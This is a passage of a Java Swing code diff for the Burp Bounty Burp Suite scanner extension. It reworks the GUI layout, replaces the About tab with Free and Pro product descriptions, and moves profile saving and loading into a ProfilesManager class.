this code. The content of this method is always - * regenerated by the Form Editor. - */ @SuppressWarnings("unchecked") // //GEN-BEGIN:initComponents private void initComponents() { @@ -2280,6 +1021,10 @@ private void initComponents() { jPopupMenu3 = new javax.swing.JPopupMenu(); jMenuItem6 = new javax.swing.JMenuItem(); jMenuItem7 = new javax.swing.JMenuItem(); + jPopupMenu4 = new javax.swing.JPopupMenu(); + jMenuItem8 = new javax.swing.JMenuItem(); + jMenuItem9 = new javax.swing.JMenuItem(); + jSplitPane1 = new javax.swing.JSplitPane(); jTabbedPane2 = new javax.swing.JTabbedPane(); jPanel1 = new javax.swing.JPanel(); jPanel6 = new javax.swing.JPanel(); @@ -2319,13 +1064,20 @@ private void initComponents() { jButton11 = new javax.swing.JButton(); jLabel48 = new javax.swing.JLabel(); jLabel49 = new javax.swing.JLabel(); - jPanel8 = new javax.swing.JPanel(); - jLabel53 = new javax.swing.JLabel(); - jLabel1 = new javax.swing.JLabel(); - jLabel3 = new javax.swing.JLabel(); + jPanel10 = new javax.swing.JPanel(); + jLabel57 = new javax.swing.JLabel(); + jLabel12 = new javax.swing.JLabel(); jLabel6 = new javax.swing.JLabel(); + jLabel22 = new javax.swing.JLabel(); jLabel7 = new javax.swing.JLabel(); - jLabel2 = new javax.swing.JLabel(); + jLabel23 = new javax.swing.JLabel(); + jLabel24 = new javax.swing.JLabel(); + jLabel1 = new javax.swing.JLabel(); + jLabel58 = new javax.swing.JLabel(); + jLabel3 = new javax.swing.JLabel(); + jLabel10 = new javax.swing.JLabel(); + jPanel8 = new javax.swing.JPanel(); + jLabel5 = new javax.swing.JLabel(); jCheckBoxMenuItem1.setSelected(true); jCheckBoxMenuItem1.setText("jCheckBoxMenuItem1"); @@ -2380,6 +1132,22 @@ public void actionPerformed(java.awt.event.ActionEvent evt) { }); jPopupMenu3.add(jMenuItem7); + jMenuItem8.setText("Enable"); + jMenuItem8.addActionListener(new java.awt.event.ActionListener() { + public void actionPerformed(java.awt.event.ActionEvent evt) { + jMenuItem8ActionPerformed(evt); + } + }); + jPopupMenu4.add(jMenuItem8); + + jMenuItem9.setText("Disable"); + jMenuItem9.addActionListener(new java.awt.event.ActionListener() { + public void actionPerformed(java.awt.event.ActionEvent evt) { + jMenuItem9ActionPerformed(evt); + } + }); + jPopupMenu4.add(jMenuItem9); + setAutoscrolls(true); jTabbedPane2.addChangeListener(new javax.swing.event.ChangeListener() { @@ -2414,8 +1182,9 @@ public void actionPerformed(java.awt.event.ActionEvent evt) { jtabpane.setFont(new java.awt.Font("Lucida Grande", 0, 14)); // NOI18N table3.setAutoCreateRowSorter(true); - table3.setFont(new java.awt.Font("Lucida Grande", 0, 14)); // NOI18N + table3.setFont(new java.awt.Font("Arial", 0, 14)); // NOI18N table3.setModel(model); + table3.setComponentPopupMenu(jPopupMenu1); table3.getTableHeader().setReorderingAllowed(false); table3.addMouseListener(new java.awt.event.MouseAdapter() { public void mousePressed(java.awt.event.MouseEvent evt) { @@ -2458,11 +1227,11 @@ public void actionPerformed(java.awt.event.ActionEvent evt) { .addComponent(jButton2, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE) .addComponent(button13, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE) .addComponent(jButton16, javax.swing.GroupLayout.PREFERRED_SIZE, 103, javax.swing.GroupLayout.PREFERRED_SIZE)) - .addContainerGap(997, Short.MAX_VALUE)) + .addContainerGap(860, Short.MAX_VALUE)) .addGroup(jPanel3Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(jPanel3Layout.createSequentialGroup() .addGap(133, 133, 133) - .addComponent(jScrollPane5, javax.swing.GroupLayout.DEFAULT_SIZE, 967, Short.MAX_VALUE) + .addComponent(jScrollPane5, javax.swing.GroupLayout.DEFAULT_SIZE, 830, Short.MAX_VALUE) .addContainerGap())) ); jPanel3Layout.setVerticalGroup( @@ -2474,15 +1243,15 @@ public void actionPerformed(java.awt.event.ActionEvent evt) { .addComponent(jButton2) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) .addComponent(button13) - .addContainerGap(506, Short.MAX_VALUE)) + .addContainerGap(743, Short.MAX_VALUE)) .addGroup(jPanel3Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) - .addComponent(jScrollPane5, javax.swing.GroupLayout.DEFAULT_SIZE, 614, Short.MAX_VALUE)) + .addComponent(jScrollPane5, javax.swing.GroupLayout.DEFAULT_SIZE, 835, Short.MAX_VALUE)) ); jtabpane.addTab(" Active Profiles ", jPanel3); table1.setAutoCreateRowSorter(true); - table1.setFont(new java.awt.Font("Lucida Grande", 0, 14)); // NOI18N + table1.setFont(new java.awt.Font("Arial", 0, 14)); // NOI18N table1.setModel(model1); table1.setRowSorter(null); table1.getTableHeader().setReorderingAllowed(false); @@ -2527,11 +1296,11 @@ public void actionPerformed(java.awt.event.ActionEvent evt) { .addComponent(jButton3, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE) .addComponent(button14, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE) .addComponent(jButton17, javax.swing.GroupLayout.PREFERRED_SIZE, 103, javax.swing.GroupLayout.PREFERRED_SIZE)) - .addContainerGap(997, Short.MAX_VALUE)) + .addContainerGap(860, Short.MAX_VALUE)) .addGroup(jPanel5Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(jPanel5Layout.createSequentialGroup() .addGap(133, 133, 133) - .addComponent(jScrollPane6, javax.swing.GroupLayout.DEFAULT_SIZE, 967, Short.MAX_VALUE) + .addComponent(jScrollPane6, javax.swing.GroupLayout.DEFAULT_SIZE, 830, Short.MAX_VALUE) .addContainerGap())) ); jPanel5Layout.setVerticalGroup( @@ -2543,15 +1312,15 @@ public void actionPerformed(java.awt.event.ActionEvent evt) { .addComponent(jButton3) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) .addComponent(button14) - .addContainerGap(506, Short.MAX_VALUE)) + .addContainerGap(743, Short.MAX_VALUE)) .addGroup(jPanel5Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) - .addComponent(jScrollPane6, javax.swing.GroupLayout.DEFAULT_SIZE, 614, Short.MAX_VALUE)) + .addComponent(jScrollPane6, javax.swing.GroupLayout.DEFAULT_SIZE, 835, Short.MAX_VALUE)) ); jtabpane.addTab(" Passive Request Profiles ", jPanel5); table2.setAutoCreateRowSorter(true); - table2.setFont(new java.awt.Font("Lucida Grande", 0, 14)); // NOI18N + table2.setFont(new java.awt.Font("Arial", 0, 14)); // NOI18N table2.setModel(model2); table2.setRowSorter(null); table2.getTableHeader().setReorderingAllowed(false); @@ -2596,11 +1365,11 @@ public void actionPerformed(java.awt.event.ActionEvent evt) { .addComponent(jButton4, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE) .addComponent(button15, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE) .addComponent(jButton18, javax.swing.GroupLayout.PREFERRED_SIZE, 103, javax.swing.GroupLayout.PREFERRED_SIZE)) - .addContainerGap(997, Short.MAX_VALUE)) + .addContainerGap(860, Short.MAX_VALUE)) .addGroup(jPanel7Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(jPanel7Layout.createSequentialGroup() .addGap(133, 133, 133) - .addComponent(jScrollPane10, javax.swing.GroupLayout.DEFAULT_SIZE, 967, Short.MAX_VALUE) + .addComponent(jScrollPane10, javax.swing.GroupLayout.DEFAULT_SIZE, 830, Short.MAX_VALUE) .addContainerGap())) ); jPanel7Layout.setVerticalGroup( @@ -2612,9 +1381,9 @@ public void actionPerformed(java.awt.event.ActionEvent evt) { .addComponent(jButton4) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) .addComponent(button15) - .addContainerGap(506, Short.MAX_VALUE)) + .addContainerGap(743, Short.MAX_VALUE)) .addGroup(jPanel7Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) - .addComponent(jScrollPane10, javax.swing.GroupLayout.DEFAULT_SIZE, 614, Short.MAX_VALUE)) + .addComponent(jScrollPane10, javax.swing.GroupLayout.DEFAULT_SIZE, 835, Short.MAX_VALUE)) ); jtabpane.addTab(" Passive Response Profiles ", jPanel7); @@ -2728,7 +1497,6 @@ public void actionPerformed(java.awt.event.ActionEvent evt) { .addContainerGap() .addGroup(jPanel4Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addComponent(jLabel50, javax.swing.GroupLayout.PREFERRED_SIZE, 575, javax.swing.GroupLayout.PREFERRED_SIZE) - .addComponent(jLabel48, javax.swing.GroupLayout.PREFERRED_SIZE, 575, javax.swing.GroupLayout.PREFERRED_SIZE) .addComponent(jLabel51) .addGroup(jPanel4Layout.createSequentialGroup() .addGroup(jPanel4Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING, false) @@ -2736,6 +1504,7 @@ public void actionPerformed(java.awt.event.ActionEvent evt) { .addComponent(jButton1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED) .addComponent(text11, javax.swing.GroupLayout.PREFERRED_SIZE, 700, javax.swing.GroupLayout.PREFERRED_SIZE)) + .addComponent(jLabel48, javax.swing.GroupLayout.PREFERRED_SIZE, 575, javax.swing.GroupLayout.PREFERRED_SIZE) .addComponent(jLabel49) .addGroup(jPanel4Layout.createSequentialGroup() .addGroup(jPanel4Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING, false) @@ -2743,7 +1512,7 @@ public void actionPerformed(java.awt.event.ActionEvent evt) { .addComponent(jButton12, javax.swing.GroupLayout.PREFERRED_SIZE, 105, javax.swing.GroupLayout.PREFERRED_SIZE)) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED) .addComponent(jScrollPane13, javax.swing.GroupLayout.PREFERRED_SIZE, 700, javax.swing.GroupLayout.PREFERRED_SIZE))) - .addGap(0, 297, Short.MAX_VALUE))) + .addGap(0, 160, Short.MAX_VALUE))) .addContainerGap()) ); jPanel4Layout.setVerticalGroup( @@ -2761,7 +1530,7 @@ public void actionPerformed(java.awt.event.ActionEvent evt) { .addComponent(jButton1) .addGap(18, 18, 18) .addComponent(jSeparator13, javax.swing.GroupLayout.PREFERRED_SIZE, 10, javax.swing.GroupLayout.PREFERRED_SIZE) - .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED) + .addGap(18, 18, 18) .addComponent(jLabel49) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) .addComponent(jLabel48) @@ -2772,79 +1541,148 @@ public void actionPerformed(java.awt.event.ActionEvent evt) { .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) .addComponent(jButton12)) .addComponent(jScrollPane13, javax.swing.GroupLayout.PREFERRED_SIZE, 205, javax.swing.GroupLayout.PREFERRED_SIZE)) - .addContainerGap(329, Short.MAX_VALUE)) + .addContainerGap(544, Short.MAX_VALUE)) ); jPanel4Layout.linkSize(javax.swing.SwingConstants.VERTICAL, new java.awt.Component[] {jButton1, jButton5}); jTabbedPane2.addTab(" Options ", jPanel4); - jLabel53.setFont(new java.awt.Font("Lucida Grande", 1, 18)); // NOI18N - jLabel53.setForeground(new java.awt.Color(255, 102, 51)); - jLabel53.setText("About"); + jPanel10.addMouseListener(new java.awt.event.MouseAdapter() { + public void mouseClicked(java.awt.event.MouseEvent evt) { + goWebBurp(evt); + } + }); + + jLabel57.setFont(new java.awt.Font("Lucida Grande", 1, 36)); // NOI18N + jLabel57.setForeground(new java.awt.Color(229, 92, 58)); + jLabel57.setText("About Pro."); - jLabel1.setFont(new java.awt.Font("Arial", 0, 14)); // NOI18N - jLabel1.setText("Burp Bounty is a web application vulnerability scanner. This Burp Suite extension allows you, in a quick and simple way, to improve the active
and passive burpsuite scanner by means of personalized rules through a very intuitive graphical interface.Through an advanced search of
patterns and an improvement of the payload to send, we can create our own issue profiles both in the active scanner and in the passive."); + jLabel12.setFont(new java.awt.Font("Arial", 0, 14)); // NOI18N + jLabel12.setText("

Burp Bounty Pro is a Burp Suite Pro extension that improves the active and passive scanner by means of advanced and customized vulnerability profiles through a very intuitive graphical interface.

On the one hand, it acts as a the most advanced and flexible web application vulnerability scanner, being able to add your own vulnerability profiles, or add your own custom payloads/requests to the existing vulnerability profiles.

On the other hand, it can simulate a manual pentest in search of maximum efficiency, without making unnecessary requests, it scans the targets only for those potentially vulnerable parameters, with the most effective payloads.

Finally, this extension also helps you by collecting valuable information when performing the manual pentest, such as possible vulnerable parameters, versions detection and more.

"); + jLabel12.setHorizontalTextPosition(javax.swing.SwingConstants.RIGHT); + + jLabel6.setFont(new java.awt.Font("Tahoma", 1, 18)); // NOI18N + jLabel6.setForeground(new java.awt.Color(0, 78, 112)); + jLabel6.setText("You are using Burp Bounty Free 4.0"); + + jLabel22.setFont(new java.awt.Font("Tahoma", 0, 12)); // NOI18N + jLabel22.setText("By using this software your are accepting the"); + + jLabel7.setFont(new java.awt.Font("Tahoma", 1, 30)); // NOI18N + jLabel7.setForeground(new java.awt.Color(229, 99, 58)); + jLabel7.setHorizontalAlignment(javax.swing.SwingConstants.RIGHT); + jLabel7.setText("Ride First
on Bug Hunting."); + + jLabel23.setHorizontalAlignment(javax.swing.SwingConstants.CENTER); + jLabel23.setIcon(new javax.swing.ImageIcon(getClass().getResource("/logo_free.png"))); // NOI18N - jLabel3.setFont(new java.awt.Font("Tahoma", 1, 18)); // NOI18N - jLabel3.setForeground(new java.awt.Color(255, 102, 51)); - jLabel3.setText("More info at: https://burpbounty.net"); - jLabel3.addMouseListener(new java.awt.event.MouseAdapter() { + jLabel24.setText("EULA"); + jLabel24.addMouseListener(new java.awt.event.MouseAdapter() { public void mouseClicked(java.awt.event.MouseEvent evt) { - jLabel3gowebBurp(evt); + jLabel24goWeb(evt); } }); - jLabel6.setFont(new java.awt.Font("Tahoma", 1, 18)); // NOI18N - jLabel6.setForeground(new java.awt.Color(255, 102, 51)); - jLabel6.setText("Burp Bounty version 3.6"); + jLabel1.setFont(new java.awt.Font("Arial", 0, 14)); // NOI18N + jLabel1.setText("

Burp Bounty Free is a Burp Suite extension that allows you, in a quick and simple way, to improve the active and passive Burp Suite scanner by means of personalized profiles through a very intuitive graphical interface. Through an advanced search of patterns and an improvement of the payload to send, we can create our own issue profiles both in the active scanner and in the passive.

"); + + jLabel58.setFont(new java.awt.Font("Lucida Grande", 1, 36)); // NOI18N + jLabel58.setForeground(new java.awt.Color(229, 92, 58)); + jLabel58.setText("About Free."); + + jLabel3.setFont(new java.awt.Font("Arial", 0, 14)); // NOI18N + jLabel3.setText("

If you need more power, I invite you to try the new Burp Bounty Pro, which gives you more power and automation during your manual pentests.

"); + + jLabel10.setFont(new java.awt.Font("Arial", 0, 24)); // NOI18N + jLabel10.setForeground(new java.awt.Color(0, 78, 112)); + jLabel10.setText("More information at: https://burpbounty.net"); + + javax.swing.GroupLayout jPanel10Layout = new javax.swing.GroupLayout(jPanel10); + jPanel10.setLayout(jPanel10Layout); + jPanel10Layout.setHorizontalGroup( + jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) + .addGroup(jPanel10Layout.createSequentialGroup() + .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) + .addGroup(jPanel10Layout.createSequentialGroup() + .addGap(14, 14, 14) + .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING, false) + .addComponent(jLabel58) + .addComponent(jLabel57) + .addGroup(javax.swing.GroupLayout.Alignment.TRAILING, jPanel10Layout.createSequentialGroup() + .addComponent(jLabel23, javax.swing.GroupLayout.DEFAULT_SIZE, 428, Short.MAX_VALUE) + .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) + .addComponent(jLabel7, javax.swing.GroupLayout.PREFERRED_SIZE, 262, javax.swing.GroupLayout.PREFERRED_SIZE)) + .addComponent(jLabel1, javax.swing.GroupLayout.PREFERRED_SIZE, 0, Short.MAX_VALUE) + .addComponent(jLabel3, javax.swing.GroupLayout.PREFERRED_SIZE, 0, Short.MAX_VALUE) + .addComponent(jLabel12, javax.swing.GroupLayout.PREFERRED_SIZE, 0, Short.MAX_VALUE) + .addGroup(javax.swing.GroupLayout.Alignment.TRAILING, jPanel10Layout.createSequentialGroup() + .addComponent(jLabel6) + .addGap(202, 202, 202)))) + .addGroup(jPanel10Layout.createSequentialGroup() + .addGap(206, 206, 206) + .addComponent(jLabel22) + .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) + .addComponent(jLabel24, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)) + .addGroup(jPanel10Layout.createSequentialGroup() + .addGap(131, 131, 131) + .addComponent(jLabel10, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE))) + .addContainerGap(1138, Short.MAX_VALUE)) + ); + jPanel10Layout.setVerticalGroup( + jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) + .addGroup(jPanel10Layout.createSequentialGroup() + .addGap(23, 23, 23) + .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING) + .addComponent(jLabel23, javax.swing.GroupLayout.PREFERRED_SIZE, 115, javax.swing.GroupLayout.PREFERRED_SIZE) + .addComponent(jLabel7, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)) + .addGap(27, 27, 27) + .addComponent(jLabel58) + .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) + .addComponent(jLabel1, javax.swing.GroupLayout.PREFERRED_SIZE, 93, javax.swing.GroupLayout.PREFERRED_SIZE) + .addGap(18, 18, 18) + .addComponent(jLabel57) + .addGap(18, 18, 18) + .addComponent(jLabel12, javax.swing.GroupLayout.PREFERRED_SIZE, 237, javax.swing.GroupLayout.PREFERRED_SIZE) + .addGap(18, 18, 18) + .addComponent(jLabel6, javax.swing.GroupLayout.PREFERRED_SIZE, 32, javax.swing.GroupLayout.PREFERRED_SIZE) + .addGap(18, 18, 18) + .addComponent(jLabel3, javax.swing.GroupLayout.PREFERRED_SIZE, 61, javax.swing.GroupLayout.PREFERRED_SIZE) + .addGap(18, 18, 18) + .addComponent(jLabel10, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) + .addGap(18, 18, 18) + .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE) + .addComponent(jLabel22, javax.swing.GroupLayout.PREFERRED_SIZE, 27, javax.swing.GroupLayout.PREFERRED_SIZE) + .addComponent(jLabel24, javax.swing.GroupLayout.PREFERRED_SIZE, 27, javax.swing.GroupLayout.PREFERRED_SIZE)) + .addContainerGap(133, Short.MAX_VALUE)) + ); - jLabel7.setFont(new java.awt.Font("Tahoma", 1, 18)); // NOI18N - jLabel7.setForeground(new java.awt.Color(255, 102, 51)); - jLabel7.setText("Same scanner, different vulnerabilities"); + jTabbedPane2.addTab(" About ", jPanel10); - jLabel2.setFont(new java.awt.Font("Arial", 0, 14)); // NOI18N - jLabel2.setText("If you need more power, I invite you to try the new Burp Bounty Pro, which gives you more power and automation during your manual pentests."); + jLabel5.setIcon(new javax.swing.ImageIcon(getClass().getResource("/Tabla.png"))); // NOI18N + jLabel5.addMouseListener(new java.awt.event.MouseAdapter() { + public void mouseClicked(java.awt.event.MouseEvent evt) { + goImageWeb(evt); + } + }); javax.swing.GroupLayout jPanel8Layout = new javax.swing.GroupLayout(jPanel8); jPanel8.setLayout(jPanel8Layout); jPanel8Layout.setHorizontalGroup( jPanel8Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(jPanel8Layout.createSequentialGroup() - .addGroup(jPanel8Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) - .addGroup(jPanel8Layout.createSequentialGroup() - .addContainerGap() - .addGroup(jPanel8Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) - .addComponent(jLabel53) - .addComponent(jLabel1, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) - .addComponent(jLabel2, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE))) - .addGroup(jPanel8Layout.createSequentialGroup() - .addGap(42, 42, 42) - .addGroup(jPanel8Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) - .addComponent(jLabel3, javax.swing.GroupLayout.PREFERRED_SIZE, 354, javax.swing.GroupLayout.PREFERRED_SIZE) - .addComponent(jLabel6, javax.swing.GroupLayout.PREFERRED_SIZE, 394, javax.swing.GroupLayout.PREFERRED_SIZE) - .addComponent(jLabel7, javax.swing.GroupLayout.PREFERRED_SIZE, 394, javax.swing.GroupLayout.PREFERRED_SIZE)))) - .addContainerGap(230, Short.MAX_VALUE)) + .addGap(19, 19, 19) + .addComponent(jLabel5) + .addContainerGap(789, Short.MAX_VALUE)) ); jPanel8Layout.setVerticalGroup( jPanel8Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(jPanel8Layout.createSequentialGroup() - .addContainerGap() - .addComponent(jLabel53) - .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED) - .addComponent(jLabel1, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) - .addGap(18, 18, 18) - .addComponent(jLabel2, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) - .addGap(31, 31, 31) - .addComponent(jLabel6, javax.swing.GroupLayout.PREFERRED_SIZE, 39, javax.swing.GroupLayout.PREFERRED_SIZE) - .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) - .addComponent(jLabel7, javax.swing.GroupLayout.PREFERRED_SIZE, 39, javax.swing.GroupLayout.PREFERRED_SIZE) - .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) - .addComponent(jLabel3, javax.swing.GroupLayout.PREFERRED_SIZE, 37, javax.swing.GroupLayout.PREFERRED_SIZE) - .addContainerGap(473, Short.MAX_VALUE)) + .addComponent(jLabel5, javax.swing.GroupLayout.PREFERRED_SIZE, 714, javax.swing.GroupLayout.PREFERRED_SIZE) + .addGap(0, 271, Short.MAX_VALUE)) ); - jTabbedPane2.addTab(" About ", jPanel8); + jTabbedPane2.addTab(" Burp Bounty Pro ", jPanel8); javax.swing.GroupLayout layout = new javax.swing.GroupLayout(this); this.setLayout(layout); @@ -2859,17 +1697,15 @@ public void mouseClicked(java.awt.event.MouseEvent evt) { }// //GEN-END:initComponents private void showprofiles(javax.swing.event.ChangeEvent evt) {//GEN-FIRST:event_showprofiles -// if (jTabbedPane2.isShowing()) { -// showProfiles("All"); -// showTags(); -// } + }//GEN-LAST:event_showprofiles private void profilesReload(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_profilesReload - //checkProfilesProperties(); + String fileload = text11.getText(); - profiles_directory = fileload + File.separator; + profiles_directory = fileload; + checkProfilesProperties(profiles_directory); makeTagsFile(); showTags(); @@ -2879,7 +1715,6 @@ private void profilesReload(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_p private void loadConfigFile(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_loadConfigFile loadConfigFile(); - //checkProfilesProperties(); }//GEN-LAST:event_loadConfigFile private void removeTagManager(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_removeTagManager @@ -2915,6 +1750,7 @@ private void newTagCombo2ActionPerformed(java.awt.event.ActionEvent evt) {//GEN- private void selectTag(java.awt.event.ItemEvent evt) {//GEN-FIRST:event_selectTag if ((evt.getStateChange() == java.awt.event.ItemEvent.SELECTED)) { showProfiles(newTagCombo2.getItemAt(newTagCombo2.getSelectedIndex())); + } }//GEN-LAST:event_selectTag @@ -2957,11 +1793,12 @@ private void addActiveProfile(java.awt.event.ActionEvent evt) {//GEN-FIRST:event if (result == JOptionPane.OK_OPTION) { if (!profile.text1.getText().isEmpty()) { - saveActiveAttackValues(profile); + ProfilesManager profile_manager = new ProfilesManager(profiles_directory); + profile_manager.saveActiveAttackValues(profile); + checkProfilesProperties(profiles_directory); showProfiles("All"); showTags(); } - } } }//GEN-LAST:event_addActiveProfile @@ -3037,12 +1874,12 @@ private void editActiveProfile(java.awt.event.ActionEvent evt) {//GEN-FIRST:even JDialog dialog = jopane1.createDialog(jopane1, "Edit Active Profile"); - dialog.setSize(new Dimension(900, 760)); + dialog.setSize(new Dimension(920, 760)); dialog.setResizable(true); dialog.setLocationRelativeTo(null); - profile.text1.setEditable(false); - setActiveAttackValues(profile_name, profile); + ProfilesManager profile_manager = new ProfilesManager(profiles_directory); + profile_manager.setActiveAttackValues(profile_name, allprofiles, profile); dialog.setVisible(true); Object selectedValue = jopane1.getValue(); @@ -3051,8 +1888,8 @@ private void editActiveProfile(java.awt.event.ActionEvent evt) {//GEN-FIRST:even result = ((Integer) selectedValue).intValue(); if (result == JOptionPane.OK_OPTION) { - - saveActiveAttackValues(profile); + profile_manager.saveActiveAttackValues(profile); + checkProfilesProperties(profiles_directory); showProfiles("All"); showTags(); } @@ -3077,7 +1914,9 @@ private void addRequestProfile(java.awt.event.ActionEvent evt) {//GEN-FIRST:even if (result == JOptionPane.OK_OPTION) { if (!profile.text1.getText().isEmpty()) { - saveRequestAttackValues(profile); + ProfilesManager profile_manager = new ProfilesManager(profiles_directory); + profile_manager.saveRequestAttackValues(profile); + checkProfilesProperties(profiles_directory); showProfiles("All"); showTags(); } @@ -3095,22 +1934,21 @@ private void editRequestProfile(java.awt.event.ActionEvent evt) {//GEN-FIRST:eve JDialog dialog = jopane1.createDialog(jopane1, "Edit Passive Request Profile"); - dialog.setSize(new Dimension(900, 760)); + dialog.setSize(new Dimension(920, 760)); dialog.setResizable(true); dialog.setLocationRelativeTo(null); - profile.text1.setEditable(false); - setRequestAttackValues(profile_name, profile); + ProfilesManager profile_manager = new ProfilesManager(profiles_directory); + profile_manager.setRequestAttackValues(profile_name, allprofiles, profile); dialog.setVisible(true); Object selectedValue = jopane1.getValue(); if (selectedValue != null) { result = ((Integer) selectedValue).intValue(); - if (result == JOptionPane.OK_OPTION) { - - saveRequestAttackValues(profile); + profile_manager.saveRequestAttackValues(profile); + checkProfilesProperties(profiles_directory); showProfiles("All"); showTags(); } @@ -3135,7 +1973,9 @@ private void addResponseProfile(java.awt.event.ActionEvent evt) {//GEN-FIRST:eve if (result == JOptionPane.OK_OPTION) { if (!profile.text1.getText().isEmpty()) { - saveResponseAttackValues(profile); + ProfilesManager profile_manager = new ProfilesManager(profiles_directory); + profile_manager.saveResponseAttackValues(profile); + checkProfilesProperties(profiles_directory); showProfiles("All"); showTags(); } @@ -3152,35 +1992,62 @@ private void editResponseProfile(java.awt.event.ActionEvent evt) {//GEN-FIRST:ev JDialog dialog = jopane1.createDialog(jopane1, "Edit Passive Response Profile"); - dialog.setSize(new Dimension(900, 760)); + dialog.setSize(new Dimension(920, 760)); dialog.setResizable(true); dialog.setLocationRelativeTo(null); - profile.text1.setEditable(false); - setResponseAttackValues(profile_name, profile); + ProfilesManager profile_manager = new ProfilesManager(profiles_directory); + profile_manager.setResponseAttackValues(profile_name, allprofiles, profile); dialog.setVisible(true); Object selectedValue = jopane1.getValue(); if (selectedValue != null) { result = ((Integer) selectedValue).intValue(); - if (result == JOptionPane.OK_OPTION) { - - saveResponseAttackValues(profile); + profile_manager.saveResponseAttackValues(profile); + checkProfilesProperties(profiles_directory); showProfiles("All"); showTags(); } } }//GEN-LAST:event_editResponseProfile - private void jLabel3gowebBurp(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_jLabel3gowebBurp + + + private void jMenuItem8ActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jMenuItem8ActionPerformed + + }//GEN-LAST:event_jMenuItem8ActionPerformed + + private void jMenuItem9ActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jMenuItem9ActionPerformed + + }//GEN-LAST:event_jMenuItem9ActionPerformed + + private void jLabel24goWeb(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_jLabel24goWeb + try { + Desktop.getDesktop().browse(new URI("https://burpbounty.net/legal")); + } catch (URISyntaxException | IOException e) { + callbacks.printError("Burp Bounty Gui 4383 Help web not opened: " + e); + } + }//GEN-LAST:event_jLabel24goWeb + + private void goWebBurp(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_goWebBurp try { Desktop.getDesktop().browse(new URI("https://burpbounty.net")); } catch (URISyntaxException | IOException e) { - callbacks.printError("Active profile line 3178 Help web not opened: " + e); + callbacks.printError("Active profile line 2109 Help web not opened: " + e); + } + 